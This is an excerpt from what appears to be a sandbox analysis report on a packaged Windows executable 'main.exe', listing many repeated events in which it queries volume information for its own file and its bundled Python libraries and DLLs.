Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\libffi-8.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
